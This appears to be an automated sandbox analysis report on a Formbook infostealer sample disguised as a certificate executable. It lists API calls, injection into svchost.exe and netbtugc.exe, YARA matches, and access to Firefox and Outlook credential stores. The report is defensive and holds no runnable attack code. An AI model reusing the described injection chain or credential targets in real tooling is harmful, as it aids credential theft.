            Source: Certificate 1045-20-11.exe, 00000000.00000000.1695638056.00000000008EE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_914c5d2e-2
            Source: Certificate 1045-20-11.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_fbb73f25-5
            Source: Certificate 1045-20-11.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_538fefa8-a
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0254B363 NtClose,1_2_0254B363
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02521D09 NtProtectVirtualMemory,1_2_02521D09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,1_2_031735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172B60 NtClose,LdrInitializeThunk,1_2_03172B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03172DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03172C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03174340 NtSetContextThread,1_2_03174340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03173010 NtOpenDirectoryObject,1_2_03173010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03173090 NtSetValueKey,1_2_03173090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03174650 NtSuspendThread,1_2_03174650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172B80 NtQueryInformationFile,1_2_03172B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172BA0 NtEnumerateValueKey,1_2_03172BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172BF0 NtAllocateVirtualMemory,1_2_03172BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172BE0 NtQueryValueKey,1_2_03172BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172AB0 NtWaitForSingleObject,1_2_03172AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172AD0 NtReadFile,1_2_03172AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172AF0 NtWriteFile,1_2_03172AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031739B0 NtGetContextThread,1_2_031739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172F30 NtCreateSection,1_2_03172F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172F60 NtCreateProcessEx,1_2_03172F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172F90 NtProtectVirtualMemory,1_2_03172F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172FB0 NtResumeThread,1_2_03172FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172FA0 NtQuerySection,1_2_03172FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172FE0 NtCreateFile,1_2_03172FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172E30 NtWriteVirtualMemory,1_2_03172E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172E80 NtReadVirtualMemory,1_2_03172E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172EA0 NtAdjustPrivilegesToken,1_2_03172EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172EE0 NtQueueApcThread,1_2_03172EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172D10 NtMapViewOfSection,1_2_03172D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03173D10 NtOpenProcessToken,1_2_03173D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172D00 NtSetInformationFile,1_2_03172D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172D30 NtUnmapViewOfSection,1_2_03172D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03173D70 NtOpenThread,1_2_03173D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172DB0 NtEnumerateKey,1_2_03172DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172DD0 NtDelayExecution,1_2_03172DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172C00 NtQueryInformationProcess,1_2_03172C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172C60 NtCreateKey,1_2_03172C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172CA0 NtQueryInformationToken,1_2_03172CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172CC0 NtQueryVirtualMemory,1_2_03172CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03172CF0 NtOpenProcess,1_2_03172CF0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_03354340 NtSetContextThread,LdrInitializeThunk,3_2_03354340
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_03354650 NtSuspendThread,LdrInitializeThunk,3_2_03354650
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_03352B60 NtClose,LdrInitializeThunk,3_2_03352B60
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_03352BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03352BA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_03352BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03352BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 3_2_03352BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03352BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352AF0 NtWriteFile,LdrInitializeThunk,3_2_03352AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352AD0 NtReadFile,LdrInitializeThunk,3_2_03352AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352F30 NtCreateSection,LdrInitializeThunk,3_2_03352F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352FB0 NtResumeThread,LdrInitializeThunk,3_2_03352FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352FE0 NtCreateFile,LdrInitializeThunk,3_2_03352FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03352E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03352EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03352D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03352D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03352DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352DD0 NtDelayExecution,LdrInitializeThunk,3_2_03352DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03352C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352C60 NtCreateKey,LdrInitializeThunk,3_2_03352C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03352CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033535C0 NtCreateMutant,LdrInitializeThunk,3_2_033535C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033539B0 NtGetContextThread,LdrInitializeThunk,3_2_033539B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352B80 NtQueryInformationFile,3_2_03352B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352AB0 NtWaitForSingleObject,3_2_03352AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352F60 NtCreateProcessEx,3_2_03352F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352FA0 NtQuerySection,3_2_03352FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352F90 NtProtectVirtualMemory,3_2_03352F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352E30 NtWriteVirtualMemory,3_2_03352E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352EA0 NtAdjustPrivilegesToken,3_2_03352EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352D00 NtSetInformationFile,3_2_03352D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352DB0 NtEnumerateKey,3_2_03352DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352C00 NtQueryInformationProcess,3_2_03352C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352CF0 NtOpenProcess,3_2_03352CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03352CC0 NtQueryVirtualMemory,3_2_03352CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03353010 NtOpenDirectoryObject,3_2_03353010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03353090 NtSetValueKey,3_2_03353090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03353D10 NtOpenProcessToken,3_2_03353D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03353D70 NtOpenThread,3_2_03353D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777920 NtCreateFile,3_2_00777920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777A70 NtReadFile,3_2_00777A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777B50 NtDeleteFile,3_2_00777B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777BE0 NtClose,3_2_00777BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00777D30 NtAllocateVirtualMemory,3_2_00777D30
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00886685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00886685
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0087ACC5
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008879D3
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: String function: 0085EC2F appears 68 times
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: String function: 0086F8A0 appears 35 times
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: String function: 00866AC0 appears 42 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 93 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0312B970 appears 250 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03175130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0330B970 appears 262 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0338EA12 appears 85 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03355130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03367E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0339F290 appears 103 times
            Source: Certificate 1045-20-11.exe, 00000000.00000003.1714213013.0000000003553000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Certificate 1045-20-11.exe
            Source: Certificate 1045-20-11.exe, 00000000.00000003.1714425888.00000000036FD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Certificate 1045-20-11.exe
            Source: Certificate 1045-20-11.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@16/7
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0088CE7A GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0087AB84 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0087B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0088E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00886532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0089C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0084406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | File created: C:\Users\user\AppData\Local\Temp\aut5DA7.tmp
            Source: Certificate 1045-20-11.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002EC1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.2055763353.0000000002EC1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Certificate 1045-20-11.exe | ReversingLabs: Detection: 28%
            Source: unknown | Process created: C:\Users\user\Desktop\Certificate 1045-20-11.exe "C:\Users\user\Desktop\Certificate 1045-20-11.exe"
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 1045-20-11.exe"
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Certificate 1045-20-11.exe | Static file information: File size 1196032 > 1048576
            Source: Certificate 1045-20-11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Certificate 1045-20-11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Certificate 1045-20-11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Certificate 1045-20-11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Certificate 1045-20-11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Certificate 1045-20-11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Certificate 1045-20-11.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4165025398.000000000017E000.00000002.00000001.01000000.00000004.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4165156204.000000000017E000.00000002.00000001.01000000.00000004.sdmp
